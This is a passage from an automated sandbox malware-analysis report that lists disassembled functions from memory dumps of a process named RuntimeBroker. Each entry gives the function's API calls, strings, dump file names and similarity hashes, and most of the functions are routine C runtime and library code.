Instruction Fuzzy Hash: 3A617232908B8585D732AB19E8807AAB7A4FB85794F444225EBDD03BA5DF7CE190CF10

Function 00007FF72B05E5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF72B05E5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF72B05E6B8

Strings

csm, xrefs: 00007FF72B05E5F2
csm, xrefs: 00007FF72B05E70A

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: e8dd506dfc603b8a3917fa28343397097fc7c12650f289d89f0e31019f2befc8
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: 67519F36A082468AEB75AF19D8C4268B698FB54BC4F948136DA9D43FE1CF3CE450CF11

Function 00007FFE0C0B3E1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B3F13
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE0C0B3F23

Strings

csm, xrefs: 00007FFE0C0B3F75
csm, xrefs: 00007FFE0C0B3E66

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
Instruction ID: 8ab135c84dd343dc9e8f3002e60e679c223d1be186b1e932e509d8bc8c9d854a
Opcode Fuzzy Hash: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
Instruction Fuzzy Hash: 54518D3298869286EB74CF59A46436876A2FF50B84F244136EB9D47BF6CF3CE550C708

Function 00007FF72B057530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF72B05324C,?,?,00007FF72B053964), ref: 00007FF72B057642

Strings

\, xrefs: 00007FF72B0575A7
%.*s, xrefs: 00007FF72B0575FB
%s%c, xrefs: 00007FF72B0575B4

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction ID: 670eb64b3ad20e227d6b924cd6b13f2152e80743bbe40f4b4cf199082df6a548
Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction Fuzzy Hash: E931EA71619AC545FA32AB18EC507EAA254FB44BE0FC04231EE6D43FE5DF2CE6418B10

Function 00007FFE0C0BA714 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE0C0BA778

Strings

%lf, xrefs: 00007FFE0C0BA7BE

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
Instruction ID: f57b2f61899458790ce20a83e7b6c7e6dd4140f4d12edc1b593d4d09d868d99b
Opcode Fuzzy Hash: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
Instruction Fuzzy Hash: 7A31B772A8C68585EB30CB29E86027A7362FF89784F448131FA9D47765CF3CE502D744

Function 00007FF72B052870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

MessageBoxW.USER32 ref: 00007FF72B052906
MessageBoxA.USER32 ref: 00007FF72B05291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF72B05290E
Warning, xrefs: 00007FF72B0528F7

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: 6fdff204d2bd53b1c08c4d5f8845a223bb5b3ed99a58e59af63a3c8d35ed5717
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 06119072628B8581FB32AB04F865BA9B364FF48784FD05135DA8D47A64DF3CD604CB50

Function 00007FF72B0525F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

MessageBoxW.USER32 ref: 00007FF72B052686
MessageBoxA.USER32 ref: 00007FF72B05269A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF72B05268E
Error, xrefs: 00007FF72B052677

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 0abdf55444c5001ce555d8f4659d7062b50a89355b13298ebedb6696a2452218
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: D9118E62628B8581FA31AB04E865BA9A364FB48784FD05135DA8C17664DF3CD605CB10

Function 00007FFE0C0B2400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B243E

Strings

csm, xrefs: 00007FFE0C0B2420
RCC, xrefs: 00007FFE0C0B2410
MOC, xrefs: 00007FFE0C0B2418

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
Instruction ID: 80e40d56e8311f2fe6f2d439ff53db1a8aaac500c347d64d0536e2c655296ffe
Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
Instruction Fuzzy Hash: 1CF0C236998242C2EB54AF28E18106C7272FF48B40F085431E74803372CF3CD4A0C705

Function 00007FFE0C0BE9E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFE0C0BE9F0

Part of subcall function 00007FFE0C0BEC30: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE0C0BECF0
Part of subcall function 00007FFE0C0BEC30: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE0C0BE9F5), ref: 00007FFE0C0BED3F

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0BEA1A

Strings

csm, xrefs: 00007FFE0C0BE9FB
f, xrefs: 00007FFE0C0BE9F5

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 2451123448-629598281
Opcode ID: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
Instruction ID: 30e4ab2926e87ab634042fd4b538f69d35292b3d14c45ab8a19cb5907c9a1218
Opcode Fuzzy Hash: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
Instruction Fuzzy Hash: D0E02B31CD834280E724EB64F19117C2BA6FF16B50F148034DB5807266CF3CF4A0C209

Function 00007FF72B06B8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF72B06B92F
WriteFile.KERNEL32 ref: 00007FF72B06BBF7
WriteFile.KERNEL32 ref: 00007FF72B06BC3D
GetLastError.KERNEL32 ref: 00007FF72B06BCF3

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction ID: 3dae9bfc67ff5a5ed588d57b68934f092cf885b1609d595cee30ffe311b52fe2
Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction Fuzzy Hash: EED11872B08A8189E722DF6DD8402BC7775FB487D8B944139CE5D97BA9DE38D106C710

Function 00007FF72B06C270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B06C25B), ref: 00007FF72B06C38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B06C25B), ref: 00007FF72B06C417

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction ID: e41ac4792b681674c8542f6d936e68fe1e6478a3726100afa7ef545ad91e4126
Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction Fuzzy Hash: 9E91B662B0865185F772EF6D9C4037DA7A0FB58B88F94413DDE0E57AA5DE3CD4818B20

Function 00007FFE0C0B9CC0 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC459
Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC492
Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B9E19
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B9E78
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B9EAA
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B9EBA

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
Instruction ID: 2e43351a75891442ff925f63d4ced028e038b26d74974efe99a77de33d0f53d4
Opcode Fuzzy Hash: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
Instruction Fuzzy Hash: 9A917A62E48B6689FB11CBA8D8903AC37B2BF04718F504036EF5D276A5DF7CA845C344

Function 00007FF72B06EC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B06ED8C
_get_daylight.LIBCMT ref: 00007FF72B06ED9D
_get_daylight.LIBCMT ref: 00007FF72B06EDAE
_isindst.LIBCMT ref: 00007FF72B06EE79

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction ID: 2330168116842aa06df1145a2fa2800efa90b297ccda609c17d245da7bfe2790
Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction Fuzzy Hash: AC510572F046118AEB35EF6C9D416BDA7A5EB18398F900139DE1E52AF5DF38E402CB10

Function 00007FFE0C0BA44C Relevance: 6.1, APIs: 4, Instructions: 134COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE0C0BA4F1
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA501
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA51E
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA553

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
Instruction ID: e2cad230cb467e1900dcce92df41f062823c97d0a41a5473cd119a69b4dc72d3
Opcode Fuzzy Hash: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
Instruction Fuzzy Hash: 7F5168B2A5865699E720CF28E9A03BC37A2BF44B44F548031EB1E077A5DF3DE541D358

Function 00007FF72B064A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF72B064ABF
GetFileInformationByHandle.KERNEL32 ref: 00007FF72B064B21
GetLastError.KERNEL32 ref: 00007FF72B064BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B0649C4), ref: 00007FF72B064BFE

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
Instruction ID: 9d71321bd6c65d40d719e8f776891b42fe228ada2eefde16b2cb41f1114510d6
Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
Instruction Fuzzy Hash: 46518F22F0464189FB61EF79D8503BDA3A1FF48B98F589539DE09477A8DF38D4818B60

Function 00007FFE0C0BC87C Relevance: 6.1, APIs: 4, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC459
Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC492
Part of subcall function 00007FFE0C0BC3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC8F7
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC906
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC982
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BC991

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
Instruction ID: 05276c9a10fd7affae49822f92b356cf532dddd916686a27907a6fb20391e8ff
Opcode Fuzzy Hash: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
Instruction Fuzzy Hash: 4A416372A08B859AFB01CF68D8953AC37A1BB88B48F548035EB8E67769CF3C9441C314

Function 00007FF72B052030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF72B052064
SetWindowLongPtrW.USER32 ref: 00007FF72B052086
GetWindowLongPtrW.USER32 ref: 00007FF72B0520B0
InvalidateRect.USER32 ref: 00007FF72B0520D0

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: c8638e91913230c79782100caf983f588930d4d4a28d6d5b07f2496bcbdb15e2
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: 8D118A21E0815242F666AB5DED842799251FF88780FD49031DA4906FAACD2DD4D19B20

Function 00007FF72B05C330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF72B05C35C
GetCurrentThreadId.KERNEL32 ref: 00007FF72B05C36A
GetCurrentProcessId.KERNEL32 ref: 00007FF72B05C376
QueryPerformanceCounter.KERNEL32 ref: 00007FF72B05C386

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
